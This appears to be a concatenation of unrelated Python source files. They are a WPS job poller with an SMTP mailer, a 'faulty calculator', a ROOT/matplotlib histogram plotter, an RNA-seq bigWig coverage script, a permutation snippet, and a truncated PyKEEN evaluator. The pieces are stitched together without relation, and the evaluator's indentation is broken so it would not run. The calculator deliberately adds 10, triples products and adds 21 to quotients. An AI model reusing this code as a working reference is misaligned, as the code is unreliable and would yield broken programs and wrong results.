    final_status = check_process_status(execution)
    transaction.set_status(final_status)
    # TODO: React based on status
    config = confuse.Configuration('Basket', __name__)
    solr = SolrClient(config['solr']['endpoint'].get(), "basket")
    solr.update(transaction.toSolrDocument())
    # send email to user
    send_email(to)
def send_email(to):
    """Send the configured notification mail to ``to`` via plain SMTP.

    Best effort: failures are logged and swallowed, and the SMTP connection
    is closed only if it was actually opened.
    """
    config = confuse.Configuration('Basket', __name__)
    message = MIMEMultipart("alternative")
    message["Subject"] = config['mail']['subject'].get()
    message["From"] = config['mail']['from'].get()
    message["To"] = to
    text = config['mail']['body']['content'].get()
    part1 = MIMEText(text, "plain")
    message.attach(part1)
    # Create secure connection with server and send email
    # context = ssl.create_default_context()
    server = None
    try:
        server = smtplib.SMTP(config['mail']['smtp']['host'].get(), config['mail']['smtp']['port'].get())
        server.sendmail(
            config['mail']['from'].get(), to, message.as_string()
        )
    except Exception:
        # Bug fix: the original bare `except:` combined with an unconditional
        # `server.quit()` in `finally` raised NameError whenever SMTP() itself
        # failed (server was never bound).  Keep the best-effort semantics.
        log.info('something wrong ......')
    finally:
        if server is not None:
            server.quit()
def check_process_status(execution, sleepSecs=3):
    """Poll a WPS execution until it completes or MAX_PROCESSING_SECOND elapses.

    Returns Status.SUCCEEDED, Status.FAILED (logging any reported errors), or
    Status.EXCEEDED when the time budget runs out.
    """
    deadline = time.time() + MAX_PROCESSING_SECOND
    while execution.isComplete() is False:
        if time.time() >= deadline:
            return Status.EXCEEDED
        execution.checkStatus(sleepSecs=sleepSecs)
    if execution.isSucceded():
        return Status.SUCCEEDED
    if execution.errors:
        for ex in execution.errors:
            log.error('Error: code=%s, locator=%s, text=%s' %
                      (ex.code, ex.locator, ex.text))
    return Status.FAILED
|
# faulty calculator program
# NOTE: the wrong results (+10, *3, +21 below) are deliberate -- see the title.
import random  # NOTE(review): imported but never used in the visible script
print('1. Addition(+) \n2. Subtration(-) \n3. Multiplication(*) \n4. Division(/) \n5. Modulus(%) \n6. Multiple(**) '
      '\n7. Exit ')
n = input('Enter your choice: ')
# 'j' acts as an alternative quit sentinel; any non-numeric other input crashes int(n).
while n != 'j':
    i = 0  # flag: set to 1 on invalid menu choice so the menu is reprinted
    n = int(n)
    if n == 1:
        x = int(input('Addition \nEnter first value: '))
        y = int(input('Enter second value: '))
        # intentionally off by +10
        print('\nAddition is ', x + y + 10, '\n')
    elif n == 2:
        x = int(input('Subtraction \nEnter first value: '))
        y = int(input('Enter second value: '))
        print('\nSubtraction value is ', x - y, '\n')
    elif n == 3:
        x = int(input(' Multiplication \nEnter first value: '))
        y = int(input('Enter second value: '))
        # intentionally multiplied by an extra 3
        print('\nMulitiplication value is ', x * y * 3, '\n')
    elif n == 4:
        x = int(input('Division \nEnter first value: '))
        y = int(input('Enter second value: '))
        # intentionally off by +21
        print('\nDivision value is ', (x / y) + 21, '\n')
    elif n == 5:
        x = int(input('Modulas \nEnter first value: '))
        y = int(input('Enter second value: '))
        print('\nModule value is ', x % y, '\n')
    elif n == 6:
        x = int(input('Multiple \nEnter first value: '))
        y = int(input('Enter mulitliple value: '))
        print('\nMultiple value is ', x ** y, '\n')
    elif n == 7:
        break
    else:
        print('\nWrong Input.....\n')
        i = 1
    if i != 0:
        # reprint the menu only after an invalid choice
        print(
            '1. Addition(+) \n2. Subtration(-) \n3. Multiplication(*) \n4. Division(/) \n5. Modulus(%) \n6. Multiple('
            '**) \n7. Exit')
    n = input('Enter your choice: ')
print('DONE')
|
#!/usr/bin/env python
import matplotlib
matplotlib.use('Agg')
import ROOT
import sys
import os.path
import matplotlib.pyplot as plt
import matplotlib.backends.backend_pdf as pdf
plt.rc('font', size = 14)
# Pairs of processes to compare: for each pair, the photon sample keeps events
# 'selected' by the gen-photon veto while the jet sample keeps 'rejected' ones;
# 'rank' picks which lepton-pT histogram (subleading/third) is plotted.
PROCESSES = [
  { 'WGamma'            : { 'option' : 'selected', 'label' : r'W+$\gamma$',             'rank' : 'subleading' },
    'WJets'             : { 'option' : 'rejected', 'label' : 'W+jets',                  'rank' : 'subleading' } },
  { 'ZGamma'            : { 'option' : 'selected', 'label' : r'Z+$\gamma$',             'rank' : 'third'      },
    'ZJets'             : { 'option' : 'rejected', 'label' : 'Z+jets',                  'rank' : 'third'      } },
  { 'TGamma'            : { 'option' : 'selected', 'label' : r't+$\gamma$',             'rank' : 'subleading' },
    'TJets_tChannel'    : { 'option' : 'rejected', 'label' : 't+jets (t-channel)',      'rank' : 'subleading' } },
  { 'TTGamma_SemiLept'  : { 'option' : 'selected', 'label' : r'$t\bar{t}+\gamma$ (SL)', 'rank' : 'subleading' },
    'TTJets_SemiLept'   : { 'option' : 'rejected', 'label' : r'$t\bar{t}$+jets (SL)',   'rank' : 'subleading' } },
  { 'TTGamma_DiLept'    : { 'option' : 'selected', 'label' : r'$t\bar{t}+\gamma$ (DL)', 'rank' : 'third'      },
    'TTJets_DiLept'     : { 'option' : 'rejected', 'label' : r'$t\bar{t}$+jets (DL)',   'rank' : 'third'      } },
]
# Directory/axis keys used in the input ROOT file.
SELECTIONS = [ 'selected', 'rejected' ]
LEPTONS = [ 'lepton', 'electron', 'muon' ]
RANKS = [ 'subleading', 'third' ]
# Key under which the selected+rejected sum is stored per lepton type.
SUM_KEY = 'sum'
# Lower edge (GeV) of the plotted pT range; bins below this are dropped.
PLOT_XMIN = 10.
def read_hist(fptr, process, selection, lepton_type, rank):
    """Read one pT histogram from the ROOT file.

    Returns {'xval': bin centres, 'yval': bin contents}, keeping only bins
    whose centre is at least PLOT_XMIN.
    """
    assert(selection in SELECTIONS)
    assert(lepton_type in LEPTONS)
    path = os.path.join('genPhotonFilter', selection, process, '{}_{}_pt'.format(rank, lepton_type))
    hist = fptr.Get(path)
    assert(hist)
    n_bins = hist.GetXaxis().GetNbins()
    centres = [hist.GetBinCenter(b) for b in range(1, n_bins + 1)]
    contents = [hist.GetBinContent(b) for b in range(1, n_bins + 1)]
    kept = [(x, y) for x, y in zip(centres, contents) if x >= PLOT_XMIN]
    return {
        'xval': [x for x, _ in kept],
        'yval': [y for _, y in kept],
    }
def read_process(fptr, process):
    """Collect every selection/rank histogram of one process, per lepton type.

    Adds a SUM_KEY entry holding, per rank, the bin-wise sum over all
    selections (selected + rejected) on the shared binning.
    """
    result = {}
    for lepton_type in LEPTONS:
        per_lepton = {}
        for selection in SELECTIONS:
            per_lepton[selection] = {
                rank: read_hist(fptr, process, selection, lepton_type, rank)
                for rank in RANKS
            }
        # All histograms of a lepton type must share one binning.
        binning = per_lepton[SELECTIONS[0]][RANKS[0]]['xval']
        assert(all(per_lepton[selection][rank]['xval'] == binning
                   for selection in SELECTIONS for rank in RANKS))
        nof_bins = len(binning)
        assert(SUM_KEY not in per_lepton)
        per_lepton[SUM_KEY] = {}
        for rank in RANKS:
            summed = [
                sum(per_lepton[selection][rank]['yval'][bin_idx] for selection in SELECTIONS)
                for bin_idx in range(nof_bins)
            ]
            per_lepton[SUM_KEY][rank] = {'xval': binning, 'yval': summed}
        result[lepton_type] = per_lepton
    return result
# Command line: <input.root> <output.pdf>
assert(len(sys.argv) == 3)
fn = sys.argv[1]
outfn = sys.argv[2]
assert(os.path.isfile(fn))
assert(outfn.endswith('.pdf'))
f = ROOT.TFile.Open(fn, 'read')
histograms = []
# Load every process of every pair into memory before closing the file,
# so plotting below needs no open ROOT file.
for process_pair in PROCESSES:
    results = {}
    for process in process_pair:
        assert(process not in results)
        results[process] = read_process(f, process)
    histograms.append(results)
f.Close()
# One multi-page PDF: per (process pair, lepton type) first a page for each
# process (veto-filtered vs inclusive), then a combined page summing the pair.
with pdf.PdfPages(outfn) as output:
    for pair_idx, process_pair in enumerate(PROCESSES):
        for lepton_type in LEPTONS:
            for process in process_pair:
                plt.figure(figsize = (10, 8), dpi = 150)
                option = PROCESSES[pair_idx][process]['option']
                label = PROCESSES[pair_idx][process]['label']
                rank = PROCESSES[pair_idx][process]['rank']
                plot_xmin = min(histograms[pair_idx][process][lepton_type][SUM_KEY][rank]['xval'])
                plot_xmax = max(histograms[pair_idx][process][lepton_type][SUM_KEY][rank]['xval'])
                # solid: events kept after the gen-photon veto decision
                plt.step(
                    histograms[pair_idx][process][lepton_type][option][rank]['xval'],
                    histograms[pair_idx][process][lepton_type][option][rank]['yval'],
                    lw = 2, linestyle = '-', label = '{}, after {} by veto'.format(label, option.replace('selected', 'accepted')),
                )
                # dashed: inclusive (selected + rejected) reference
                plt.step(
                    histograms[pair_idx][process][lepton_type][SUM_KEY][rank]['xval'],
                    histograms[pair_idx][process][lepton_type][SUM_KEY][rank]['yval'],
                    lw = 2, linestyle = '--', label = r'{}, inclusive'.format(label),
                )
                nof_bins = len(histograms[pair_idx][process][lepton_type][SUM_KEY][rank]['xval'])
                plot_ymin = min(
                    min(
                        histograms[pair_idx][process][lepton_type][option][rank]['yval'][bin_idx],
                        histograms[pair_idx][process][lepton_type][SUM_KEY][rank]['yval'][bin_idx]
                    ) for bin_idx in range(nof_bins)
                )
                # pad negative minima by 5%, otherwise clamp the axis floor to 0
                plot_ymin *= 1.05 if plot_ymin < 0. else 0
                plot_ymax = max(
                    max(
                        histograms[pair_idx][process][lepton_type][option][rank]['yval'][bin_idx],
                        histograms[pair_idx][process][lepton_type][SUM_KEY][rank]['yval'][bin_idx]
                    ) for bin_idx in range(nof_bins)
                )
                plot_ymax *= 1.05
                plt.xlabel(r'{} {} $p_T$ [GeV]'.format(rank.capitalize(), lepton_type))
                plt.ylabel('Weighted number of events')
                plt.grid(True)
                plt.xlim(plot_xmin, plot_xmax)
                plt.ylim(plot_ymin, plot_ymax)
                plt.legend(loc = 'upper right')
                output.savefig(bbox_inches = 'tight')
                plt.close()
            # Combined page: both processes of the pair plus their bin-wise sum.
            assert(len(process_pair) > 0)
            plt.figure(figsize = (10, 8), dpi = 150)
            rank = PROCESSES[pair_idx][list(process_pair.keys())[0]]['rank']
            assert(all(PROCESSES[pair_idx][process]['rank'] == rank for process in process_pair))
            binning = histograms[pair_idx][list(process_pair.keys())[0]][lepton_type][SUM_KEY][rank]['xval']
            assert(all(binning == histograms[pair_idx][process][lepton_type][SUM_KEY][rank]['xval'] for process in process_pair))
            yvals_sum = [
                sum(
                    histograms[pair_idx][process][lepton_type][PROCESSES[pair_idx][process]['option']][rank]['yval'][bin_idx] \
                    for process in process_pair
                ) for bin_idx in range(len(binning))
            ]
            plot_xmin = min(binning)
            plot_xmax = max(binning)
            plot_ymin = min(yvals_sum)
            # same padding/clamping convention as the per-process pages
            plot_ymin *= 1.05 if plot_ymin < 0. else 0
            plot_ymax = max(yvals_sum) * 1.05
            for process in process_pair:
                option = PROCESSES[pair_idx][process]['option']
                label = PROCESSES[pair_idx][process]['label']
                plt.step(
                    binning,
                    histograms[pair_idx][process][lepton_type][option][rank]['yval'],
                    lw = 2, linestyle = '-', label = '{}, after {} by veto'.format(label, option.replace('selected', 'accepted')),
                )
            plt.step(binning, yvals_sum, lw = 2, linestyle = '-', label = 'Sum of the above')
            plt.xlabel(r'{} {} $p_T$ [GeV]'.format(rank.capitalize(), lepton_type))
            plt.ylabel('Weighted number of events')
            plt.grid(True)
            plt.xlim(plot_xmin, plot_xmax)
            plt.ylim(plot_ymin, plot_ymax)
            plt.legend(loc = 'upper right')
            output.savefig(bbox_inches = 'tight')
            plt.close()
|
'''
Created on Dec 10, 2012
@author: mkiyer
'''
import logging
import argparse
import sys
import os
import subprocess
import pysam
import oncoseq.rnaseq.lib.picard as picard
from oncoseq.rnaseq.lib.config import STRAND_SUFFIX_DICT
from oncoseq.rnaseq.lib.base import check_executable
from oncoseq.rnaseq.lib.libtable import FR_UNSTRANDED
from oncoseq.rnaseq.lib.inspect import RnaseqLibraryMetrics
def make_coverage_map(bam_file, bigwig_file, scale_factor,
                      chrom_sizes_file, tmp_dir):
    """Build a bigWig coverage track from a BAM file.

    Writes an intermediate bedGraph via `bedtools genomecov` (scaled by
    scale_factor), then converts it with `bedGraphToBigWig`.  Returns 0 on
    success, 1 on failure; partial outputs are removed on error and the
    temporary bedGraph is removed on success.
    """
    logging.debug("Generating coverage bedGraph file")
    genomecov_cmd = ["bedtools", "genomecov", "-bg", "-split",
                     "-scale", scale_factor,
                     "-ibam", bam_file]
    logging.debug("bedtools args: %s" % (map(str, genomecov_cmd)))
    bedgraph_file = os.path.join(tmp_dir, "coverage.bedgraph")
    outfh = open(bedgraph_file, "w")
    rc = subprocess.call(map(str, genomecov_cmd), stdout=outfh)
    outfh.close()
    if rc != 0:
        logging.error("Error during bedtools genomecov")
        if os.path.exists(bedgraph_file):
            os.remove(bedgraph_file)
        return 1
    logging.debug("Convert bedGraph to bigWig file")
    convert_cmd = ["bedGraphToBigWig", bedgraph_file, chrom_sizes_file, bigwig_file]
    logging.debug("bedGraphToBigWig args: %s" % (map(str, convert_cmd)))
    rc = subprocess.call(convert_cmd)
    if rc != 0:
        logging.error("Error during bedGraphToBigWig")
        if os.path.exists(bigwig_file):
            os.remove(bigwig_file)
        return 1
    if os.path.exists(bedgraph_file):
        os.remove(bedgraph_file)
    return 0
def subdivide_bam_by_strand(bam_file, output_prefix, strand_tag, tmp_dir):
    """Split a BAM file into per-strand BAM files based on a SAM tag.

    Reads without the tag are treated as unstranded ('.').  Returns a dict
    mapping strand ('+'/'-'/'.') to the temporary BAM path; strands that
    received no reads are removed (and their empty files deleted).

    NOTE(review): a tag value outside {'+', '-', '.'} would raise KeyError on
    strand_counts -- confirm upstream guarantees the tag's value set.
    """
    # setup output files
    strand_bam_files = {}
    strand_bam_fhs = {}
    strand_counts = {'+': 0, '-': 0, '.': 0}
    infh = pysam.Samfile(bam_file, 'rb')
    for strand,suffix in STRAND_SUFFIX_DICT.iteritems():
        filename = os.path.join(tmp_dir, "%s_%s.bam" %
                                (output_prefix, suffix))
        strand_bam_files[strand] = filename
        # template=infh copies the input header into each output BAM
        strand_bam_fhs[strand] = pysam.Samfile(filename, 'wb', template=infh)
    # iterate through input file
    for r in infh:
        # get strand tag from SAM
        try:
            strand = r.opt(strand_tag)
        except KeyError:
            strand = "."
        # write to appropriate output file
        strand_counts[strand] += 1
        outfh = strand_bam_fhs[strand]
        outfh.write(r)
    infh.close()
    for fh in strand_bam_fhs.itervalues():
        fh.close()
    # drop strands that got no reads so callers only see useful files
    for strand,count in strand_counts.iteritems():
        logging.debug("Found %d reads on %s strand" % (count, strand))
        if count == 0:
            bam_file = strand_bam_files[strand]
            if os.path.exists(bam_file):
                os.remove(bam_file)
            del strand_bam_files[strand]
    return strand_bam_files
def main():
    """Generate (optionally scaled) bigWig coverage tracks from a BAM file.

    Unstranded libraries yield a single <prefix>.bw; stranded libraries are
    first split by the strand tag and yield one track per strand.  Returns 0
    on success, 1 on failure.
    """
    # setup logging
    logging.basicConfig(level=logging.DEBUG,
                        format="%(asctime)s - %(name)s - %(levelname)s - %(message)s")
    # command line parsing
    parser = argparse.ArgumentParser()
    parser.add_argument('--scale', dest='scale', action="store_true", default=False)
    parser.add_argument('--strand-tag', dest='strand_tag', default='XS')
    parser.add_argument('--tmp-dir', dest="tmp_dir", default="/tmp")
    parser.add_argument('library_metrics_file')
    parser.add_argument('picard_alignment_metrics_file')
    parser.add_argument('chrom_sizes_file')
    parser.add_argument('bam_file')
    parser.add_argument('bigwig_prefix')
    args = parser.parse_args()
    # fail fast if the external tools are missing
    if not check_executable("bedGraphToBigWig"):
        parser.error("'bedGraphToBigWig' executable not found in PATH")
    if not check_executable("bedtools"):
        parser.error("'bedtools' executable not found in PATH")
    # determine normalization factor from picard metrics
    scale_factor = 1.0
    if args.scale:
        logging.debug("Reading library size from picard alignment metrics file")
        align_metrics = picard.AlignmentSummaryMetrics(args.picard_alignment_metrics_file)
        library_size = align_metrics.get_total_reads()
        logging.debug("Found library size: %d" % (library_size))
        if library_size > 0:
            # reads-per-million normalisation
            scale_factor = 1.0e6 / float(library_size)
    # predict library type
    logging.debug("Getting library type")
    obj = RnaseqLibraryMetrics.from_file(args.library_metrics_file)
    predicted_library_type = obj.predict_library_type()
    logging.debug("Predicted library type: %s" % (predicted_library_type))
    if predicted_library_type == FR_UNSTRANDED:
        # unstranded so make a single coverage map
        logging.debug("Generating unstranded coverage map")
        bigwig_file = args.bigwig_prefix + ".bw"
        # NOTE(review): retcode is not checked in this branch, so an unstranded
        # failure still returns 0 -- confirm whether that is intended.
        retcode = make_coverage_map(args.bam_file,
                                    bigwig_file,
                                    scale_factor,
                                    args.chrom_sizes_file,
                                    args.tmp_dir)
    else:
        logging.debug("Splitting BAM file by strand")
        prefix = os.path.splitext(os.path.basename(args.bam_file))[0]
        strand_bam_files = subdivide_bam_by_strand(args.bam_file,
                                                   prefix,
                                                   args.strand_tag,
                                                   args.tmp_dir)
        logging.debug("Generating strand-specific coverage maps")
        for strand,bam_file in strand_bam_files.iteritems():
            bigwig_file = "%s_%s.bw" % (args.bigwig_prefix, STRAND_SUFFIX_DICT[strand])
            retcode = make_coverage_map(bam_file, bigwig_file,
                                        scale_factor,
                                        args.chrom_sizes_file,
                                        args.tmp_dir)
            if retcode != 0:
                logging.error("Error")
                if os.path.exists(bigwig_file):
                    os.remove(bigwig_file)
                return 1
        # clean up the temporary per-strand BAM files
        for f in strand_bam_files.itervalues():
            if os.path.exists(f):
                os.remove(f)
    return 0
# Script entry point: propagate main()'s return value as the exit code.
if __name__ == '__main__':
    sys.exit(main())
#Write a function permute to compute all possible permutations of elements of a given list.
import itertools
def permute(data):
    """Return every permutation of the elements of ``data`` as a list of tuples."""
    perms = itertools.permutations(data)
    return list(perms)
# Example usage (Python 2 print statement).
print permute([1,2,3,4])
|
# -*- coding: utf-8 -*-
"""Basic structure of a evaluator."""
import gc
import logging
import timeit
from abc import ABC, abstractmethod
from contextlib import contextmanager
from dataclasses import dataclass
from math import ceil
from typing import Any, Collection, Iterable, List, Mapping, Optional, Tuple, Union, cast
import numpy as np
import torch
from dataclasses_json import DataClassJsonMixin
from tqdm.autonotebook import tqdm
from ..models import Model
from ..triples.utils import get_entities
from ..typing import MappedTriples
from ..utils import (
is_cuda_oom_error, is_cudnn_error, is_nonzero_larger_than_maxint_error, normalize_string,
split_list_in_batches_iter,
)
# Public API of this module.
__all__ = [
    'Evaluator',
    'MetricResults',
    'filter_scores_',
    'evaluate',
]
logger = logging.getLogger(__name__)
@contextmanager
def optional_context_manager(condition, context_manager):
    """Enter ``context_manager`` only when ``condition`` is truthy.

    Yields the context manager object itself when entered, otherwise None.
    """
    if not condition:
        yield
        return
    with context_manager:
        yield context_manager
@dataclass
class MetricResults(DataClassJsonMixin):
    """Results from computing metrics."""

    def get_metric(self, name: str) -> float:
        """Get the given metric from the results.

        :param name: The name of the metric to retrieve.
        :raises NotImplementedError: subclasses must provide the lookup.
        """
        raise NotImplementedError

    def to_flat_dict(self) -> Mapping[str, Any]:
        """Get the results as a flattened dictionary."""
        return self.to_dict()
class Evaluator(ABC):
"""An abstract evaluator for KGE models.
The evaluator encapsulates the computation of evaluation metrics based on head and tail scores. To this end, it
offers two methods to process a batch of triples together with the scores produced by some model. It maintains
intermediate results in its state, and offers a method to obtain the final results once finished.
"""
    def __init__(
        self,
        filtered: bool = False,
        requires_positive_mask: bool = False,
        batch_size: Optional[int] = None,
        slice_size: Optional[int] = None,
        automatic_memory_optimization: bool = True,
    ):
        """Initialize the evaluator.

        :param filtered: Whether filtered evaluation is used.
        :param requires_positive_mask: Whether this evaluator needs a dense mask of other true entities per batch.
        :param batch_size: Evaluation batch size; None lets it be determined automatically (see ``evaluate``).
        :param slice_size: Optional slice size for scoring entities in chunks when a full batch does not fit.
        :param automatic_memory_optimization: Whether to search for the maximal feasible batch/slice size on GPU.
        """
        self.filtered = filtered
        self.requires_positive_mask = requires_positive_mask
        self.batch_size = batch_size
        self.slice_size = slice_size
        self.automatic_memory_optimization = automatic_memory_optimization
@classmethod
def get_normalized_name(cls) -> str:
"""Get the normalized name of the evaluator."""
return normalize_string(cls.__name__, suffix=Evaluator.__name__)
    @abstractmethod
    def process_tail_scores_(
        self,
        hrt_batch: MappedTriples,
        true_scores: torch.FloatTensor,
        scores: torch.FloatTensor,
        dense_positive_mask: Optional[torch.FloatTensor] = None,
    ) -> None:
        """Process a batch of triples with their computed tail scores for all entities.

        :param hrt_batch: shape: (batch_size, 3)
        :param true_scores: shape: (batch_size)
        :param scores: shape: (batch_size, num_entities)
        :param dense_positive_mask: shape: (batch_size, num_entities)
            An optional binary (0/1) tensor indicating other true entities.
        :raises NotImplementedError: concrete evaluators must implement this.
        """
        raise NotImplementedError
    @abstractmethod
    def process_head_scores_(
        self,
        hrt_batch: MappedTriples,
        true_scores: torch.FloatTensor,
        scores: torch.FloatTensor,
        dense_positive_mask: Optional[torch.FloatTensor] = None,
    ) -> None:
        """Process a batch of triples with their computed head scores for all entities.

        :param hrt_batch: shape: (batch_size, 3)
        :param true_scores: shape: (batch_size)
        :param scores: shape: (batch_size, num_entities)
        :param dense_positive_mask: shape: (batch_size, num_entities)
            An optional binary (0/1) tensor indicating other true entities.
        :raises NotImplementedError: concrete evaluators must implement this.
        """
        raise NotImplementedError
    @abstractmethod
    def finalize(self) -> MetricResults:
        """Compute the final results, and clear buffers.

        :return: the metric results accumulated since the last call.
        :raises NotImplementedError: concrete evaluators must implement this.
        """
        raise NotImplementedError
    def evaluate(
        self,
        model: Model,
        mapped_triples: Optional[MappedTriples] = None,
        batch_size: Optional[int] = None,
        slice_size: Optional[int] = None,
        device: Optional[torch.device] = None,
        use_tqdm: bool = True,
        tqdm_kwargs: Optional[Mapping[str, str]] = None,
        restrict_entities_to: Optional[torch.LongTensor] = None,
        do_time_consuming_checks: bool = True,
    ) -> MetricResults:
        """Run :func:`pykeen.evaluation.evaluate` with this evaluator.

        :param model: The model to evaluate.
        :param mapped_triples: The triples to evaluate on; defaults to the model's mapped triples.
        :param batch_size: Evaluation batch size; None triggers the automatic search on GPU.
        :param slice_size: Optional slice size for scoring entities in chunks.
        :param device: Device to evaluate on; None uses the model's device.
        :param use_tqdm: Whether to show a progress bar.
        :param tqdm_kwargs: Extra keyword arguments for the progress bar.
        :param restrict_entities_to: Optionally restrict evaluation to these entities.
        :param do_time_consuming_checks: Whether to run expensive consistency checks.
        :return: The finalized metric results.
        """
        if mapped_triples is None:
            mapped_triples = model.triples_factory.mapped_triples
        if batch_size is None and self.automatic_memory_optimization:
            # Using automatic memory optimization on CPU may result in undocumented crashes due to OS' OOM killer.
            if model.device.type == 'cpu':
                logger.info(
                    "Currently automatic memory optimization only supports GPUs, but you're using a CPU. "
                    "Therefore, the batch_size will be set to the default value.",
                )
            else:
                batch_size, slice_size = self.batch_and_slice(
                    model=model,
                    mapped_triples=mapped_triples,
                    batch_size=batch_size,
                    device=device,
                    use_tqdm=False,
                    restrict_entities_to=restrict_entities_to,
                    do_time_consuming_checks=do_time_consuming_checks,
                )
                # The batch_size and slice_size should be accessible to outside objects for re-use, e.g. early stoppers.
                self.batch_size = batch_size
                self.slice_size = slice_size
                # Clear the ranks from the current evaluator
                self.finalize()
        rv = evaluate(
            model=model,
            mapped_triples=mapped_triples,
            evaluators=self,
            batch_size=batch_size,
            slice_size=slice_size,
            device=device,
            squeeze=True,
            use_tqdm=use_tqdm,
            tqdm_kwargs=tqdm_kwargs,
            restrict_entities_to=restrict_entities_to,
            do_time_consuming_checks=do_time_consuming_checks,
        )
        # Since squeeze is true, we can expect that evaluate returns a MetricResult, but we need to tell MyPy that
        return cast(MetricResults, rv)
    def batch_and_slice(
        self,
        model: Model,
        mapped_triples: MappedTriples,
        batch_size: Optional[int] = None,
        device: Optional[torch.device] = None,
        use_tqdm: bool = False,
        restrict_entities_to: Optional[torch.LongTensor] = None,
        do_time_consuming_checks: bool = True,
    ) -> Tuple[int, Optional[int]]:
        """Find the maximum possible batch_size and slice_size for evaluation with the current setting.

        The speed of evaluation can be greatly increased when the batch_size is increased, therefore this function
        estimates the maximal possible batch_size for the evaluation by starting with the batch_size given as argument
        and increasing it until the hardware runs out-of-memory(OOM). In some cases, i.e. with very large models or very
        large datasets, even the batch_size 1 is too big for the hardware at hand. In these cases, this function will
        check if the model at hand allows slicing (this needs to be implemented for the affected scoring functions) and,
        if possible, will search the maximum possible slice_size that would still allow to calculate the model with the
        given parameters on the hardware at hand.

        :param model:
            The model to evaluate.
        :param mapped_triples:
            The triples on which to evaluate.
        :param batch_size:
            The initial batch size to start with. None defaults to number_of_triples.
        :param device:
            The device on which the evaluation shall be run. If None is given, use the model's device.
        :param use_tqdm:
            Should a progress bar be displayed?
        :param restrict_entities_to:
            Whether to restrict the evaluation to certain entities of interest.
        :param do_time_consuming_checks:
            Whether expensive consistency checks are performed during the probing evaluations.
        :return:
            Maximum possible batch size and, if necessary, the slice_size, which defaults to None.
        :raises MemoryError:
            If it is not possible to evaluate the model on the hardware at hand with the given parameters.
        """
        batch_size, evaluated_once = self._param_size_search(
            key='batch_size',
            start_value=batch_size,
            model=model,
            mapped_triples=mapped_triples,
            device=device,
            use_tqdm=use_tqdm,
            restrict_entities_to=restrict_entities_to,
            do_time_consuming_checks=do_time_consuming_checks,
        )
        if evaluated_once:  # slice_size = None
            return batch_size, None
        # We need to try slicing, if the evaluation for the batch_size search never succeeded
        slice_size, evaluated_once = self._param_size_search(
            key='slice_size',
            # Since the batch_size search with size 1, i.e. one tuple ((h, r) or (r, t)) scored on all entities,
            # must have failed to start slice_size search, we start with trying half the entities.
            start_value=ceil(model.num_entities / 2),
            model=model,
            mapped_triples=mapped_triples,
            device=device,
            use_tqdm=use_tqdm,
            restrict_entities_to=restrict_entities_to,
            do_time_consuming_checks=False,
        )
        if not evaluated_once:
            raise MemoryError("The current model can't be trained on this hardware with these parameters.")
        return batch_size, slice_size
def _param_size_search(
    self,
    key: str,
    start_value: Optional[int],
    model: Model,
    mapped_triples: MappedTriples,
    device: Optional[torch.device] = None,
    use_tqdm: bool = False,
    restrict_entities_to: Optional[torch.LongTensor] = None,
    do_time_consuming_checks: bool = True,
) -> Tuple[int, bool]:
    """Search the largest working value for ``batch_size`` or ``slice_size``.

    Repeatedly runs a size-probing evaluation, halving the value whenever a
    CUDA/cuDNN out-of-memory error occurs and doubling it after a success,
    until the largest value that evaluates successfully has been found.

    :param key:
        Which parameter to search: ``'batch_size'`` or ``'slice_size'``.
    :param start_value:
        The initial value to try; a key-specific default is used if None.
    :param model:
        The model to evaluate.
    :param mapped_triples:
        The triples on which to evaluate.
    :param device:
        The device on which the evaluation shall be run. If None is given, use the model's device.
    :param use_tqdm:
        Should a progress bar be displayed?
    :param restrict_entities_to:
        Whether to restrict the evaluation to certain entities of interest.
    :param do_time_consuming_checks:
        Whether to perform some time consuming checks on the provided arguments.
    :return:
        The value found for the searched parameter, and whether any probing
        evaluation ever succeeded with it.
    :raises AttributeError:
        If ``key`` is neither ``'batch_size'`` nor ``'slice_size'``.
    """
    values_dict = {}
    maximum_triples = mapped_triples.shape[0]
    if key == 'batch_size':
        if start_value is None:
            start_value = 256
        # A batch can never be larger than the number of triples to evaluate.
        if start_value > maximum_triples:
            start_value = maximum_triples
        values_dict[key] = start_value
        values_dict['slice_size'] = None
    elif key == 'slice_size':
        if start_value is None:
            start_value = ceil(model.num_entities / 2)
        # Fail fast if the model does not implement slicing at all.
        self._check_slicing_availability(model, batch_size=1)
        values_dict[key] = start_value
        values_dict['batch_size'] = 1
    else:
        raise AttributeError(f'The parameter {key} is unknown.')
    reached_max = False
    evaluated_once = False
    logger.info(f'Starting {key} search for evaluation now...')
    while True:
        logger.debug(f'Trying {key}={values_dict[key]}')
        try:
            # The cache of the previous run has to be freed to allow accurate memory availability estimates
            gc.collect()
            torch.cuda.empty_cache()
            evaluate(
                model=model,
                mapped_triples=mapped_triples,
                evaluators=self,
                only_size_probing=True,
                device=device,
                squeeze=True,
                use_tqdm=use_tqdm,
                restrict_entities_to=restrict_entities_to,
                do_time_consuming_checks=do_time_consuming_checks,
                batch_size=values_dict.get('batch_size'),
                slice_size=values_dict.get('slice_size'),
            )
            evaluated_once = True
        except RuntimeError as runtime_error:
            # Due to the caused OOM Runtime Error, the failed model has to be cleared to avoid memory leakage
            for p in model.parameters():
                if p.grad is not None:
                    del p.grad  # free some memory
            # The cache of the previous run has to be freed to allow accurate memory availability estimates
            gc.collect()
            torch.cuda.empty_cache()
            # Only known out-of-memory conditions are handled; anything else is a real error.
            if (
                not is_cudnn_error(runtime_error)
                and not is_cuda_oom_error(runtime_error)
                and not is_nonzero_larger_than_maxint_error(runtime_error)
            ):
                raise runtime_error
            if values_dict[key] == 1:
                logger.debug(
                    f"Even {key} {values_dict[key]} does not fit into your memory with these parameters.",
                )
                break
            # values_dict[key] will always be an int at this point
            values_dict[key] //= 2  # type: ignore
            reached_max = True
            if evaluated_once:
                # A previously doubled value failed; the halved value is the answer.
                logger.info(f'Concluded {key} search with batch_size={values_dict[key]}.')
                break
            else:
                logger.debug(f'The {key} {values_dict[key]} was too big, trying less now')
        else:
            # The cache of the previous run has to be freed to allow accurate memory availability estimates
            gc.collect()
            torch.cuda.empty_cache()
            if not reached_max and values_dict['batch_size'] < maximum_triples:
                # Still growing: double the value and probe again.
                values_dict[key] *= 2  # type: ignore
            else:
                logger.info(f'Concluded {key} search with batch_size={values_dict[key]}.')
                break
    return cast(Tuple[int, bool], (values_dict[key], evaluated_once))
@staticmethod
def _check_slicing_availability(model: Model, batch_size: int) -> None:
# Test if slicing is implemented for the required functions of this model
if model.triples_factory.create_inverse_triples:
if not model.can_slice_t:
raise MemoryError(f"The current model can't be evaluated on this hardware with these parameters, as "
f"evaluation batch_size={batch_size} is too big and slicing is not implemented for "
f"this model yet.")
elif not model.can_slice_t or not model.can_slice_h:
